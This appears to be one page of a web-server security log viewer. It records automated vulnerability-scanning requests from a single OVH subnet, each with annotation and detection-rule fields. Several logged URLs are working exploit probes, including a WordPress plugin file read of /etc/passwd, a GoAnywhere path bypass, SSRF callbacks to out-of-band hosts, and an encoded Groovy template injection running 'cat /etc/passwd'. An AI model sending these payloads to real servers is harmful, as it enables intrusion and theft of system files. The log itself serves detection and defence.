#34 2025-04-22 00:09:56 event 5374034 GET 200 bytes 27853

ann base label observed

Request event observed

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#35 2025-04-22 00:09:55 event 5374032 GET 404 bytes 28426

ann base label observed

Request event observed

/Admin/Admin.aspx

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Admin/Admin.aspx

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#36 2025-04-22 00:09:55 event 5374031 POST 404 bytes 7897

ann base label observed

Request event observed

/clients/MyCRL

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/clients/MyCRL

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#37 2025-04-22 00:09:54 event 5374030 GET 404 bytes 28426

ann base label observed

Request event observed

/classes/common/busiFacade.php

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/classes/common/busiFacade.php

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#38 2025-04-22 00:09:54 event 5374027 GET 404 bytes 28426

ann base label observed

Request event observed

/render/info.html

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/render/info.html

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#39 2025-04-22 00:09:53 event 5374025 GET 404 bytes 28426

ann base label observed

Request event observed

/cslu/v1/var/logs/customer-cslu-lib-log.log

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cslu/v1/var/logs/customer-cslu-lib-log.log

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#40 2025-04-22 00:09:52 event 5374023 GET 404 bytes 28426

ann base label observed

Request event observed

/access/set?param=enableapi&value=1

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/access/set?param=enableapi&value=1

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#41 2025-04-22 00:09:52 event 5374022 GET 404 bytes 28426

ann base label observed

Request event observed

/cslu/v1/scheduler/jobs

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cslu/v1/scheduler/jobs

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#42 2025-04-22 00:09:52 event 5374020 POST 404 bytes 28426

ann base label observed

Request event observed

/task/submit/

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/task/submit/

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#43 2025-04-22 00:09:51 event 5374017 GET 404 bytes 28426

ann ref 9 label ref

Request Open-redirect style parameter points to an external URL

/filex/read-raw?url=http://oast.me&cut=1

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

ref

rule

ref:open_redirect_param

conf

85.00

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

More (full fields + snapshot) expand

url

/filex/read-raw?url=http://oast.me&cut=1

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Open-redirect style parameter points to an external URL

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#44 2025-04-22 00:09:51 event 5374017 GET 404 bytes 28426

ann base label observed

Request event observed

/filex/read-raw?url=http://oast.me&cut=1

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/filex/read-raw?url=http://oast.me&cut=1

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#45 2025-04-22 00:09:50 event 5374016 GET 404 bytes 28426

ann base label observed

Request event observed

/file=http://oast.pro

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/file=http://oast.pro

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#46 2025-04-22 00:09:49 event 5374015 GET 404 bytes 28426

ann base label observed

Request event observed

/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#47 2025-04-22 00:09:49 event 5374014 POST 301 bytes 169

ann base label observed

Request event observed

/wp-admin/admin-ajax.php

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/wp-admin/admin-ajax.php

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#48 2025-04-22 00:09:49 event 5374012 POST 404 bytes 28426

ann base label observed

Request event observed

/index.php/display/status_zigbee

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php/display/status_zigbee

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#49 2025-04-22 00:09:48 event 5374011 GET 404 bytes 28426

ann base label observed

Request event observed

/api/v1/markdown/link:metadata?link=http://localhost:13042

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/api/v1/markdown/link:metadata?link=http://localhost:13042

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

event observed

details

—

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

#50 2025-04-22 00:09:47 event 5374010 GET 404 bytes 28426

ann trav 34 label trav

Request Path traversal / LFI indicator detected

/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fas…

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Annotation facts

label

trav

rule

trav:sensitive_target

conf

95.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20

referer

-

UA

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

summary

Path traversal / LFI indicator detected

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

subnet

51.68.76.0/24

asn

16276 — OVH SAS

geo

France, Hauts-de-France, Roubaix

org

OVH

Page 1 of 4

← Prev Next →